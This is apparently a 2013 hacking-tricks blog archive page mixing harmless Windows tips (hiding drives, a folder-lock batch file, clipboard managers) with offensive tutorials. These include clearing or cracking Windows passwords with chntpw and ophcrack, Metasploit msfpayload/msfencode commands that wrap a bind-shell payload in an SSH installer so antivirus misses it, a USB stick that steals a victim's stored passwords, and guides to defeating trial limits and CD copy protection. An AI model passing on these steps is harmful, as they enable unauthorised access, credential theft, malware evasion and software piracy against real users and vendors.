Latest Games :

PRITAM BHALERAO

Showing posts with label Windows Hacking. Show all posts
Showing posts with label Windows Hacking. Show all posts

HOW TO HIDE DRIVES USING CMD

Thursday, 21 November 2013 | 0 comments

HOW TO HIDE DRIVES USING CMD:


1-First go to search and type diskpart and hit enter.

2-Now “diskpart.exe” is open then type “list volume”, this command is used to see all the drives/volume which is present currently on your system.

3-Then type “select volume” and hit enter this command is for to select the which drive/volume you want to hide.

4-Here I am “select volume 0 , I want to hide my ‘G drive’.You can hide your drive with the volume present in your system.

5-Type “remove letter G” and hit enter.

6-now I will show you how to assign the hide drive/volume.
Type “assign letter G”.It will again assign the disk volume.
Continue Reading

How to Remove Virus from your Computer With command prompt Without Using Any Antivirus ?

Friday, 15 November 2013 | 0 comments

How to Remove Virus from your Computer With command prompt Without Using Any Antivirus ?
 
 
Go to start -> type cmd -> once your command prompt window is opened.
select the drive form which you want to remover virus
for example we take "D" drive

D:\>
your "D" drive will be displayed like this on your command prompt window.... Now write the following command...

D:\>attrib -s -h *.* /s /d

the above command will unhide each and every single file on your "D" drive including the virus exe's and autorun.inf file.

once the above command is compiled again you'll see a message
D:\>
this is indicates that the above command executed successfully... Now type "dir" command

D:\>dir
and press enter, DIR is used to list all the files and directories on present on "D" drive....
After the successful execution of DIR command, all the files and folder will be listed on the prompt window...
Now check for suspicious files (i.e. exe's) and autorun.inf files,
once you find the above files.... just rename them and do change their extensions...
look example

D:\> rename autorun.inf abcde.pqr

this command will rename autorun.inf file to abcde with extension as "pqr"
same action can be performed over the exe files.

This code can be used with external storage media like pendrive.

NOTE: As autorun.inf files are used in order to run the virus exe as soon as the directory is opened by the user... So whenever you find any autorun.inf file, just rename them, because they are more dangerous than the virus itself,
exe file cannot execute itself, either you need to click on it or autorun.inf files are used to execute them.

If you find it useful please share.
Continue Reading

How to crack windows password using Backtrack ?

Thursday, 14 November 2013 | 0 comments

 
For cracking windows password using Backtrack you should have
a Backtrack DVD. 
Insert DVD and boot from it. 
Now Backtrack have
many offline password cracking
tools pre-installed, we will use one of them.
Continue using following steps:
 
Step 1: Open
applications>Ba ctrack>Privileg e
Escalation>Pass word
Hacks>Offline Attacks>chntpw
 
Step 2: Type fdisk -l
 
Step 3 Type mkdir /mnt/apple
 
Step 4: Type mount -t ntfs-3g /
dev/sda1 /mnt/apple
 
Step 5: Type ./chntpw -l /mnt/
apple/WINDOWS/ system32/
config/SAM
 
Step 6: Type ./chntpw /mnt/
apple/WINDOWS/ system32/
config/SAM
 
Step 7: After you have the user
edit menu select the appropriate
step, here we have to clear
password so type 1 and press
enter
 
Step 8: Now it will ask for
writing hive files so type y and
press enter
Now your windows password
has been cleared. When the next
time you will login it will not ask
for password.
Enjoy!!!
Continue Reading

How To Disable Right Click On Any Blog or Website ?

Sunday, 15 September 2013 | 0 comments


If you own a blog or a website then you always want to prevent other malicious bloggers from copying the content from your blog. You might have written an article with great efforts and lots of research and other just copy/paste it on their blog. To prevent such users from copying content from your blog i will show you Javascript Trick to disable right click on your blog. So lets get started.


How To Disable Right Click On Your Blog ?

 1. Got to your blogger Dashboard and then Click on Layout.

blogger widget


 2. Now Click on Add Gadget and select Html/Javascript.

blogger widget


 3. Now paste code given below in the pop up window.
<!--AHT Code-->
<script language='JavaScript1.2'>
function disableselect(e){
return false
}
function reEnable(){
return true
}
document.onselectstart=new Function ("return false")
if (window.sidebar){
document.onmousedown=disableselect
document.onclick=reEnable
}
</script>
<!--Code End http://atihackingtricks.blogspot.in>

4. Save it and done. Now users will not be able to right click on your website.
Continue Reading

How to Block Facebook On Any Computer

Saturday, 14 September 2013 | 0 comments



In this tutorial i will share with you guys an amazing programme or small little tool that will allow you block facebook on your computer easily in just few simple steps. So lets get started


How To Use Facebook Blocker ? 

 1. First download Facebook Blocker by Clicking Here

  2. Extract the file and right click on Facebook Blocker.exe and run it as administator (Important)

  3. Press 1 in order to  backup your host file to be on the safe side.


facebook blocker

  4. Now Press 2 to block facebook

  5. Its time to check if facebook is blocked or not to do that Press 5

  6. Hope this help you if you have any question leave a comment below.
Continue Reading

How to Password Protect Any Folder Without Any Software

| 0 comments



In this tutorial i will show you interesting and usefull trick to password protect folder without using any software using batch file programming. This trick will work on all windows platform (Win XP, Win 7). Follow below tutorial to learn this trick.


How To Lock Folder ?

   1. Open Notepad and Copy code given below into it.
cls
@ECHO OFF
title coolhacking-tricks.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST MyFolder goto MDMyFolder
:CONFIRM
echo Are you sure to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren MyFolder "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== Atihacks goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" MyFolder
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDMyFolder
md MyFolder
echo MyFolder created successfully
goto End
:End
   2. Save the notepad file as lock.bat (.bat is must)
   3. Now double click on lock.bat and a new folder will be created with name MyFolder
   4. Copy all your data you want to protect in that New folder
   5. Now double click on lock.bat and when command promp appears Type Y and press enter.
   6. Now MyFolder will be hidden from you view, to access that folde double click on lock.bat
   7. It will ask for password enter your password and done. (Default password is coolhacks)
  • To change the password replace Atihacks with  new password in the above code

How To Further Secure ?

You might be thinking that anyone can access the password by opening that lock.bat file in Notepad or any other text editor. To make it more secure hide lock.bat in some secure location after following the above tutorial To access the secured file double click on lock.bat. I would suggest copying lock.bat file into Pendrive and copying it into your computer whenever you required to access to your protected files.

Continue Reading

How to Create A Undeletable or Unrenamable Folder In Windows

Tuesday, 10 September 2013 | 0 comments

In this tutorial you will learn cool and simple trick to Create an undeletable and unrenamable Folders In Windows operating system. Most of the Peoples are not aware that it is possible to create Undeletable, Unrenamable folder in windows without any software. To Test this concept just follow simple steps given below.

Try to make a new folder in windows & give it name con,aux, lpt1, lpt2, lpt3 up to lpt9. you won't be allowed to create folder with above mentioned names, Because they are reserved words in windows.



How To Create Undeletable And Unrenamable Folders ?

  1. Go to Start and then Click on Run
  2. Type cmd & hit enter (To open Command Prompt ).
  3. Remember you cannot create Undeletable & unrenamable folder in your root directory (i.e. where the windows is installed) That means you can't make this kind of folder in C: drive if you installed windows on C:
  4. Type D: or E: and hit enter
  5. Type md con\ and hit enter (md - make directory)
  6. You may use other words such as aux, lpt1, lpt2, lpt3 up to lpt9 instead of con in above step.
  7. Open that directory, you will see the folder created of name con.
  8. Try to delete that folder or rename that folder windows will show the error message.

How to delete that folder ?

It is not possible to delete that folder manually but you can delete this folder by another way mentioned below.
  1. Open Command Prompt
  2. Type D: ( if u created this type of folder in D: drive) & hit enter
  3. Type rd con\ (rd - remove directory)
  4. Open that directory and the folder will not appear because it is removed.
Continue Reading

Trick To Hack Windows 7 Password with Ophcrack

| 0 comments

In this tutorial i will teach you to hack Windows 7 password using free open source software called ophcrack. This hack also works on Windows XP and Windows Vista. So let get started.


What Is Ophcrack ?

Opcrack is an open source windows password cracker based on rainbow tables. It comes with Graphical user interface(GUI) and runs on multiple platform such windows, linux and mac.  It allows you to recover or hack windows password.

How To Crack Windows 7 Password Using Ophcrack ?

Before you start doing this you will need a blank CD or DVD to burn the live image of ophcrack.

  1. Download Opcrack Live Cd by Clicking Here. Download windows xp or windows 7 live cd depending on platform you are wishing to hack. For example:
  • Windows 7 or Windows Vista: Click on ophcrack Vista/7 LiveCD.
  • Windows XP: Click on ophcrack XP LiveCD.
  2. Now burn the live image on to the cd.
  3. Insert the disc into drive and restart you computer.
  4. If everything goes right you will see screen like below.



  


5. After you see screen like above wait for ophcrack to boot automatically or you may press Enter to advance.
6. Now you will see several lines of code printed on screen or they might disappear very quickly (you dont need to worry about that).



windows 7 password hacking
  




8. Ophcrack WILL NOT CRACK THE PASSWORD because the hash table which it needs is not available for free. But it does show the NTLM hash.
9. Copy this hash value which is under NT Hash field. 
10. Navigate to http://crackstation.net/ which is an online hash cracking tool.
11. Type in the hash value you copied down in step 9, Enter the captche and click on Crack Hashes.

Continue Reading

How To Convert PDF Files into word, excel, images, html

Friday, 6 September 2013 | 0 comments



There are a lot web services that allows you to convert pdf files for free. Here I’ll mention a few:


1. pdftoword.com



2. pdfonline.com





3. freepdfconvert.com/convert_pdf_to_source.asp

Continue Reading

Trick to Retrieve Clipboard History in Windows

Monday, 29 July 2013 | 0 comments



Ever copied a code snippet or text from the web and forgot to paste it before you copied something else? So, wondering to know how to retrieve clipboard history?
Well, all of us will have an experience of something like this where we want to desperately retrieve those information that was once copied to the clipboard. But since Windows clipboard will only remember the last item that was copied onto it, it would seem impossible to recover the information that was copied earlier. However, this problem can be solved using any of the following alternative clipboard managers in place of the default one.
In this post you will find a few such alternative clipboard managers for Windows using which it would be possible to save and retrieve every piece of information that was copied to the clipboard. Here’s a quick list:

1. Clipdiary


This tool is a powerful clipboard manager which will store every piece of information that was copied to the clipboard including text, images or any other file. Clipdiary automatically loads upon Windows startup and maintains a database to store the history of all copied items.
This makes it possible to retrieve the information that was once copied to the clipboard, be it the last hour or the last week. Clipdiary is a shareware tool which comes with a 30 day fully functional evaluation period.

2. ClipMagic

ClipMagic is similar to Clipdiary but includes a few extra features that could seem handy for advanced users. The following are some of the extra features of ClipMagic that are not present in Clipdiary:
  • Categorize/organize your clips. You can also create filters/rules for your incoming clips
  • You can store/categorize your ideas to research fast
  • Assign often used text like email signatures to hotkeys

3. Ditto

Ditto is a powerful alternative to the default Windows clipboard manager which is an open source tool. It keeps track of all the copied items such as text, images and other files so that you can retrieve them whenever necessary. The following are some of the highlights of Ditto:
  • Assign hotkeys to frequently used clippings
  • Search and organize the clippings based on task or project
  • Supports unicode so that you can copy foreign and non-standard characters without any issues
  • Get a preview of all the copied items including thumbnails of images just by pressing the assigned hotkey
  • Ditto comes as a freeware so that you can enjoy all of its features free of cost
Even though Ditto is a freeware, it is still comparable to the two shareware tools discussed earlier. So in my opinion Ditto is always the first choice. You may still download and try all the three and keep the one that you like!
Never miss a new update again. Join my blog for free and get valuable Hacking Tricks,Security Tips,Safety Tips delivered right through your inbox.



Continue Reading

Trick to Bypass Right Click Block on Any Website

| 0 comments



Here is a step-by-step procedure to disable JavaScript on different browsers:

For Internet Explorer:

If you are using IE, just follow the steps below:
  1. From the menu bar, go to Tools -> Internet Options.
  2. In the “Internet Options” window, switch to Security tab and click on the button Custom level
  3. From the Security Settings, look for the option Active scripting and select the Disable radio button as shown above and click on “OK”.
  4. You may even select the Prompt radio button, so that each time a page is loaded, you will have the option to either enable or disable the scripting.
 

For Google Chrome:

If you are using Chrome, you can disable the JavaScript by following the steps below:
  1. Click on the Chrome “menu” button (on the top right corner) and select Tools.
  2. From the “Settings” page, click on Show advanced settings…
  3. Now under Privacy, click on the button Content settings…
  4. Under the JavaScript, select the radio button which says “Do not allow any site to run JavaScript” and click on “Done”.

 

For Mozilla Firefox:

Steps to disable JavaScript on Firefox:
  1. From the menu bar, click on Tools -> Options.
  2. From the Options window, switch to Content tab, uncheck the option which says “Enable JavaScript” and click on “OK”.

     

    How to Bypass the Right Click Block?

    In order to bypass the right-click block or any other restriction imposed by JavaScript, all you need to do is just disable it in the browser and refresh the same page, so that it now reloads without JavaScript functionality. You are now free to right-click on the page, view its source or even copy any of the images that you may want to. Don’t forget to re-enable the JavaScript once again when your job is over. Otherwise lack of JavaScript support may result in unusual rendering of web pages.
Continue Reading

Trick To Bypass Antivirus Detection | How to Make An Executable FUD

| 0 comments



So in this tutorial we will show you step by step on how to make a virus Fully Undetectable from all the antiviruses. Thought their are lots of approaches, however our team member Malik Rafay has managed to find a way to make an executable FUD using msfencode.

Requirements 

A Backtrack machine , real or virtual. I used Backtrack 5 r3, but other versions of Backtrack are working OK too !!!

Attention !!!

We are using some harmless test files but don't infect people with any real viruses that's a Crime and we here at atihackingtricks are not responsible for.

Purpose:

Antivirus protects machines from malware but not all of it .there are ways to pack malware to make it harder to detect. well use metasploit to render malware completely invisible to antivirus.

Creating a Listener:

This is a simple payload that gives the attacker remote control of a machine. It is not a virus ant won't spread, but it is detected by antivirus engines. In Backtrack in a Terminal windows execute these commands: 

cd
msfpayload
 windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe
ls -l listen.exe


You should see the listen.exe file as shown below:


Analyzing the Listener with VirusTotal

Go to https://www.virustotal.com/en/

Click the "Choose File" button. Navigate to /root and double-click the listen.exe"listen.exe" appears in the "Choose File" box, as shown below:

In the virustotal web page , Click the "scan it" button !!!
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that many of the antivirus engines detected the file--33 out of 42, when I did it, as shown below. You may see different numbers, but many of the engines should detect it.
Encoding the Listener

this process will encode the listener, & insert it into an innocent SSH file.
In BackTrack, in a Terminal window, execute these commands:
wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exemsfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1ls -l evil*

You should see the evil-ssh.exe file as shown below :


Scan with virusTOTAL

Go to: https://www.virustotal.com/
If you see a "File already analyzed" message, click the "View last analysis" button.
The analysis shows that fewer of the antivirus engines detect the file now--21 out of 42, when I did it, as shown below. You may see different numbers.
 

Encode the Listener Again This process will encode the listener with several different encodings.

In BackTrack, in a Terminal window, execute these commands:
msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1msfencode -i /root/listen2.exe -t raw -o


/root/listen3.exe -e x86/jmp_call_additive -c 1
msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1


msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen*
You should see several files as shown below :

Analyzing Again
The analysis shows that fewer of the antivirus engines detect the file now 0 out of 42 When I did it as shown below. you may see different numbers.
 

Note:-It was originally Published by hacky shacky  and I re-shared in my blog. So lets check out how to works.
Continue Reading

How to Make Your Pendrive a Password Stealer

Sunday, 28 July 2013 | 0 comments




Here's a small hackby which you can turn any into a password stealer.The pendrive will steal all the stored passwords in the system of the victim.
Download : You can download the files from here.

Steps of Use :
1.Extract pendrive password stealer.rar . 
2.Copy all the contents of the file.
3.Paste the contents in the pendrive you want to use for stealing.
4.Insert the pendrive in the system of the victim.
5.Click on "launch" file.
6.Within seconds your pendrive will have text files containing all the stored passwords of the victim for any website.
P.S. :If the victim is not using stored passwords,then the password files will come out empty.
Note: This is for educational purposes only. Author is not liable for any misuse.
Continue Reading

How to Hack trial Softwares for Lifetime

| 0 comments

 
 
Hi, I am back today with a most usefull article..Hope all of you will Like It ! Here i will show you that "How to Hack Softwares to use them Forever ?" . That really a useful article,because in our daily life we need thousand of softwares today,which of most are highly paid..So how to use them Freely for whole Like ??

Most of us are familiar with many softwares that run only for a specified period of time in the trial mode.Once the trial period is expired these softwares stop functioning and demand for a purchase.But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?

Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares.I’ll try to explain this in brief.Because Purpose if ICA is 1st to clear your basics.So,When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc.After installation every time you run the software, it compares the current system date and time with the installed date and time.So, with this it can make out whether the trial period is expired or not.

So with this being the case, just manually changing the system date to an earlier date will not solve the problem.For this purpose there is a small Tool known as RunAsDate.

RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.



 Download RunAsDate v1.10

Intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify.It works with Windows 2000, XP, 2003 and Vista.

NOTE: FOLLOW THESE TIPS CAREFULLY

 
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate .
3. After the trial period is expired, do not run the software(program) directly.If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.
Continue Reading

Trick to Download Windows RT Jailbreak Tool To Run Unsigned Apps

| 0 comments




As we reported to you a few days ago, a group of software creators managed to bypass Windows RT’s restrictions and run unsigned desktop applications on the operating system, basically opening the door to a whole new world of jailbreaking tools.

Even though the whole process of jailbreaking Windows RT was pretty complicated, it was only a matter of time before someone came up with a dedicated solution supposed to perform this task all by itself.

Now XDA Developers user “netham45” has released a batch file that does the entire jailbreakingprocess automatically, so it modifies the Windows RT system kernel without user interaction.

Even though the software developer admits that some users might get a BSOD after launching the application, he says that everything should work just fine on all Windows RT tablets, including Microsoft’s Surface RT.

At this point, there are only a few software solutions available on a jailbroken Windows RT unit, including VNC Server and Client, Putty and Bochs, but many more apps are very likely to be added to the list as new users do the jailbreak.

Microsoft has already confirmed the jailbreak, saying that it “applauds the ingenuity” of the software developers behind the project, but also hinted that a future fix could block their attempts to modify the system kernel.

netham45 explained that Microsoft would have a very hard time trying to block their efforts. “They can patch it through Windows Update, but since we have the ability to reinstall from recovery partitions we can revert any Windows Updates they release,” he explained.

The jailbreak would only last until the Windows RT device is restarted and even though it may sound like a glitch, it’s actually a simple way to make sure that you won’t lose the warranty or get infected by some sort of virus compiled for the tablet-oriented operating system.
Continue Reading

Trick to CRACK ANY TYPE OF CD PROTECTION

| 0 comments


Using W32Dasm, and HIEW. 

OK, let’s start:
First of all, you have to run the damn game you want to crack, without the CD.
The game, doesn’t work of course, (Please, don’t panic) BUT a window pops up, telling you an error message. 
This error message will help you to crack the game so, you’ve got to remember it.
For example: Please insert the - CD, or: You need the CD to play the - . 
( -, is the game you want to crack). Anyway, if you are so idiot and you can’t remember it, write it, in a little piece of paper.
Now, run Win32Dasm, and on the toolbar, press the first little button on the left, OR, go to Disassembler ->Open file to Disassemble. A menu will pop up. Select the exe which you want to crack. The disassemble, will take few minutes so, I suggest you, to go for shitting. 

OK, it finished its process. 
Now, in your screen, there is a strange text, and we can’t understand anything of course. Don’t worry, the only thing we have to do, ( If you want, you can change the font), is to click on the String Data References, the button next to the print button (Strn.REF). 
You can see a window which is called String Data Items. Scroll down, and try to find the game’s error message. When you’ll find it, double click on it, and then, close the window, to go back to the Win32Dasm text. 
As you can see you are somewhere in the CD check routine. This is the message’s place. Now comes the interesting and difficult part, so, be careful. 
We don’t know what all these shits mean, BUT we must know the @ offset of every call and jump command.
Write down, every call and jump @ offset number. (You have to be sure, that the OPBAR change its used color to green). You need the number behind the @offset without the h. Let’s go to HIEW, now.

HIEW:
To move up and down, use the cursor keys. Start HIEW. exe. 
In the HIEW directory, there is a list of exes and programs. Go to the directory, which you saved the game’s exe, we want to crack, and click on the exe. Click F4, and then, a menu will pop up, with 3 words. Text, Hex, and Decode. Click on Decode, and now, we can understand the list of numbers.
Click F5, and you can now enter the number, we wrote down, in Win32Dasm. Type it, and you will be placed at the number’s place. The cursor is placed on a command. 

Before I’ll continue, I want to explain you something. For example, if the command where our cursor is placed on, is E92BF9BF74, means that it is 5 bytes.
Every 2 numbers, are one byte: E9-2B-F9-BF-74 = 90-90-90-90-90. 10 letters, mean, 5 bytes. 
OK, if you understood it, you can continue. 

Press F3, which means edit, and now you can edit these ten numbers.
Type five times, the number 90. For every byte, 90. Now click on F10 to exit.
We cracked the CD protection


Continue Reading
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. PRITAM BHALERAO - All Rights Reserved
Template Modify by Creating Website
Proudly powered by Blogger